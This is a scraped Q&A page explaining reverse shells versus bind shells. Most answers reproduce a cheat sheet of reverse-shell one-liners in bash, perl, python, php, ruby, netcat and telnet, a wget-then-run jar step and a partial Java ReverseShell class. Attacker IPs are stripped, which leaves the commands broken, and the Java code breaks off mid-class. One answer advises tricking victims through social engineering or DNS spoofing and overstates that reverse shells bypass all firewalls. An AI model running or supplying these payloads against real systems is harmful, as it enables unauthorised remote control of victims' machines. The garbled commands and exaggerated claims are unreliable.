• Uncategorized

About shell : What-is-a-reverse-shell-closed

Question Detail

Could someone explain in deep what is reverse shell about and in what cases are we supposed to use it?
I found this http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet regarding the same, what is the meaning of:

bash -i >& /dev/tcp/ 0>&1

Question Answer

It’s a(n insecure) remote shell introduced by the target. That’s the opposite of a “normal” remote shell, that is introduced by the source.

Let’s try it with localhost instead of

  • Open two tabs in your terminal.

    1. open TCP port 8080 and wait for a connection:

      nc localhost -lp 8080
    2. Open an interactive shell, and redirect the IO streams to a TCP socket:

      bash -i >& /dev/tcp/localhost/8080 0>&1


      • bash -i “If the -i option is present, the shell is interactive.”
      • >& “This special syntax redirects both, stdout and stderr to the specified target.”
      • (argument for >&) /dev/tcp/localhost/8080 is a TCP client connection to localhost:8080.
      • 0>&1 redirect file descriptor 0 (stdin) to fd 1 (stdout), hence the opened TCP socket is used to read input.

      Cf. http://wiki.bash-hackers.org/syntax/redirection

  • Rejoice as you have a prompt in tab 1.
  • Now imagine not using localhost, but some remote IP.

In addition to the excellent answer by @Kay, the answer to your question why is it called reverse shell is because it is called reverse shell as opposed to a bind shell

Bind shell – attacker’s machine acts as a client and victim’s machine acts as a server opening up a communication port on the victim and waiting for the client to connect to it and then issue commands that will be remotely (with respect to the attacker) executed on the victim’s machine. This would be only possible if the victim’s machine has a public IP and is accessible over the internet (disregarding all firewall etc. for the sake of brevity).

Now what if the victim’s machine is NATed and hence not directly reachable ? One possible solution – So what if the victim’s machine is not reachable. My (attacker’s) machine is reachable. So let me open a server at my end and let the victim connect to me. This is what a reverse shell is.

Reverse Shell – attacker’s machine (which has a public IP and is reachable over the internet) acts as a server. It opens a communication channel on a port and waits for incoming connections. Victim’s machine acts as a client and initiates a connection to the attacker’s listening server.
This is exactly what is done by the following:

bash -i >& /dev/tcp/ 0>&1

Examples of reverse shells in various languages. Danger is a word.

bash shell

bash -i >& /dev/tcp/ 0>&1;

perl shell

perl -e 'use Socket;$i="";$p=10086;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';

python shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",10086));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);';

php shell

php -r '$sock=fsockopen("",10086);exec("/bin/sh -i <&3 >&3 2>&3");';

ruby shell

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("","10086");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end';

nc shell

nc -c /bin/sh 10086;

telnet shell

telnet 10086 | /bin/bash | telnet 10087; # Remember to listen on your machine also on port 4445/tcp; mknod test p ; telnet 10086 0<test | /bin/bash 1>test;

java jar shell

wget -O /tmp/revs1.jar;

java -jar /tmp/revs1.jar;

import java.io.IOException;    
public class ReverseShell {    
    public static void main(String[] args) throws IOException, InterruptedException {
        // TODO Auto-generated method stub
        Runtime r = Runtime.getRuntime();
        String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);


Reverse shell is getting the connection from the victim or target to your computer. You can think of, your computer (attacker) acts like a server and listens on port specified by him, now you make sure victim connects to you by sending syn packet ( depends on reverse shell implementation whether it is implemented using tcp or udp principals). Now connection appears as if victim himself intending to connect us.
Now in order to trick the victim you need to perform social engineering attacks or do dns spoofing and make sure your victim runs the program.
A successful reverse shell would bypass all firewalls – both host based and network based firewalls.
Reverse shell are of different types – tcp based or http based or reverse tcp based or udp based reverse shells.

bash -i >& /dev/tcp/ 0>&1
To open a socket in Linux you have dev /tcp. You are basically opening tcp socket in Linux.

General format is /dev/tcp/ip address /port.
Now listen to port 8080 using net cat as
nc – l – p 8080 – – vv

A simple bash based reverse shell would be executing following command on the victim
nc – e /bin/bash 8080. It means you are asking vict to connect to your ip address on port 8080 assuming is victims ip.

In general a reverse shell is a payload that functions as a shell to the operating system, this means means that it either uses the OS API directly, or indirectly through spawning shells in the background, to perform read / write operations on the target computer’s memory and hardware. If you can get the payload on to the target computer and get them to execute it, it can connect to the attacker IP and spawn a thread that waits on the port for the attacker to send a command over some protocol like http; it then can parse the command and use the OS API to perform the operation and send status back to the attacker, or it could spawn a shell in the background with the command as a command line argument and redirect the output to a file, which it can then read and send back to the attacker.

The common example you see is the payload using the OS API to spawn a shell process and supplies a command line that opens a child shell and redirects the stdin / stdout of the shell itself to network sockets.

So how normal hacking works is you try to connect to your target and hack through there,

a reverse shell is when your target connects to the attacker by a payload or something alike

there is a good tutorial on network chuck

a reverse shell is also a basic form of rat

You may also like...

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.